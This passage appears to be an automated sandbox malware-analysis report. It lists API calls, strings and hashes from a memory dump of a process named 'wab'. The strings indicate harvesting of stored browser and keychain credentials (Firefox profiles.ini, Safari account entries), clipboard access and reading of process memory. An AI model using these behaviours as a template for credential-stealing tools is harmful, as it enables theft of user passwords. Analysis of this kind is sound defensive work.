                                                • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: File$CloseCreateErrorHandleLastRead
                                                • String ID:
                                                • API String ID: 2136311172-0
                                                • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??2@??3@
                                                • String ID:
                                                • API String ID: 1936579350-0
                                                • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • EmptyClipboard.USER32 ref: 004098EC
                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                • GlobalFix.KERNEL32(00000000), ref: 00409927
                                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                • GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                • GetLastError.KERNEL32 ref: 0040995D
                                                • CloseHandle.KERNEL32(?), ref: 00409969
                                                • GetLastError.KERNEL32 ref: 00409974
                                                • CloseClipboard.USER32 ref: 0040997D
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                                • String ID:
                                                • API String ID: 2565263379-0
                                                • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Library$AddressFreeLoadMessageProc
                                                • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                • API String ID: 2780580303-317687271
                                                • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • EmptyClipboard.USER32 ref: 00409882
                                                • wcslen.MSVCRT ref: 0040988F
                                                • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                • GlobalFix.KERNEL32(00000000), ref: 004098AC
                                                • memcpy.MSVCRT ref: 004098B5
                                                • GlobalUnWire.KERNEL32(00000000), ref: 004098BE
                                                • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                • CloseClipboard.USER32 ref: 004098D7
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
                                                • String ID:
                                                • API String ID: 2014503067-0
                                                • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetLastError.KERNEL32 ref: 004182D7
                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                • LocalFree.KERNEL32(?), ref: 00418342
                                                • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                                                  • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                                                  • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                                                • String ID: OsError 0x%x (%u)
                                                • API String ID: 403622227-2664311388
                                                • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                  • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                  • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                • OpenClipboard.USER32(?), ref: 00411878
                                                • GetLastError.KERNEL32 ref: 0041188D
                                                • DeleteFileW.KERNEL32(?), ref: 004118AC
                                                  • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                                                  • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                  • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                  • Part of subcall function 004098E2: GlobalFix.KERNEL32(00000000), ref: 00409927
                                                  • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                  • Part of subcall function 004098E2: GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                                  • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                  • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                                                  • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ClipboardFile$Global$CloseTemp$AllocDataDeleteDirectoryEmptyErrorHandleLastNameOpenPathReadSizeWindowsWire
                                                • String ID:
                                                • API String ID: 1203541146-0
                                                • Opcode ID: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                • Instruction ID: 30b21b9b2413019ae2959f490c9fe9c3e0a1eb79cd5a134b572bdad6ddd06780
                                                • Opcode Fuzzy Hash: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                • Instruction Fuzzy Hash: C7F0A4367003006BEA203B729C4EFDB379DAB80710F04453AB965A62E2DE78EC818518
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??2@??3@memcpymemset
                                                • String ID:
                                                • API String ID: 1865533344-0
                                                • Opcode ID: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                • Opcode Fuzzy Hash: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Version
                                                • String ID:
                                                • API String ID: 1889659487-0
                                                • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: NtdllProc_Window
                                                • String ID:
                                                • API String ID: 4255912815-0
                                                • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • _wcsicmp.MSVCRT ref: 004022A6
                                                • _wcsicmp.MSVCRT ref: 004022D7
                                                • _wcsicmp.MSVCRT ref: 00402305
                                                • _wcsicmp.MSVCRT ref: 00402333
                                                  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                  • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                • memset.MSVCRT ref: 0040265F
                                                • memcpy.MSVCRT ref: 0040269B
                                                  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                • memcpy.MSVCRT ref: 004026FF
                                                • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                • API String ID: 577499730-1134094380
                                                • Opcode ID: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                • Opcode Fuzzy Hash: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                • String ID: :stringdata$ftp://$http://$https://
                                                • API String ID: 2787044678-1921111777
                                                • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                • GetWindowRect.USER32(?,?), ref: 00414088
                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                • GetDC.USER32 ref: 004140E3
                                                • wcslen.MSVCRT ref: 00414123
                                                • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                • ReleaseDC.USER32(?,?), ref: 00414181
                                                • _snwprintf.MSVCRT ref: 00414244
                                                • SetWindowTextW.USER32(?,?), ref: 00414258
                                                • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                • GetClientRect.USER32(?,?), ref: 004142E1
                                                • GetWindowRect.USER32(?,?), ref: 004142EB
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                • GetClientRect.USER32(?,?), ref: 0041433B
                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                • String ID: %s:$EDIT$STATIC
                                                • API String ID: 2080319088-3046471546
                                                • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • EndDialog.USER32(?,?), ref: 00413221
                                                • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                • memset.MSVCRT ref: 00413292
                                                • memset.MSVCRT ref: 004132B4
                                                • memset.MSVCRT ref: 004132CD
                                                • memset.MSVCRT ref: 004132E1
                                                • memset.MSVCRT ref: 004132FB
                                                • memset.MSVCRT ref: 00413310
                                                • GetCurrentProcess.KERNEL32 ref: 00413318
                                                • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                • memset.MSVCRT ref: 004133C0
                                                • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                • memcpy.MSVCRT ref: 004133FC
                                                • wcscpy.MSVCRT ref: 0041341F
                                                • _snwprintf.MSVCRT ref: 0041348E
                                                • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                • SetFocus.USER32(00000000), ref: 004134B7
                                                Strings
                                                • {Unknown}, xrefs: 004132A6
                                                • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                • API String ID: 4111938811-1819279800
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                • EndDialog.USER32(?,?), ref: 0040135E
                                                • DeleteObject.GDI32(?), ref: 0040136A
                                                • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                • ShowWindow.USER32(00000000), ref: 00401398
                                                • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                • ShowWindow.USER32(00000000), ref: 004013A7
                                                • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                • String ID:
                                                • API String ID: 829165378-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • memset.MSVCRT ref: 00404172
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                • wcscpy.MSVCRT ref: 004041D6
                                                • wcscpy.MSVCRT ref: 004041E7
                                                • memset.MSVCRT ref: 00404200
                                                • memset.MSVCRT ref: 00404215
                                                • _snwprintf.MSVCRT ref: 0040422F
                                                • wcscpy.MSVCRT ref: 00404242
                                                • memset.MSVCRT ref: 0040426E
                                                • memset.MSVCRT ref: 004042CD
                                                • memset.MSVCRT ref: 004042E2
                                                • _snwprintf.MSVCRT ref: 004042FE
                                                • wcscpy.MSVCRT ref: 00404311
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                • API String ID: 2454223109-1580313836
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                • SetMenu.USER32(?,00000000), ref: 00411453
                                                • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                • memcpy.MSVCRT ref: 004115C8
                                                • ShowWindow.USER32(?,?), ref: 004115FE
                                                • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                  • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                  • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                • API String ID: 4054529287-3175352466
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: wcscat$_snwprintfmemset$wcscpy
                                                • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                • API String ID: 3143752011-1996832678
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
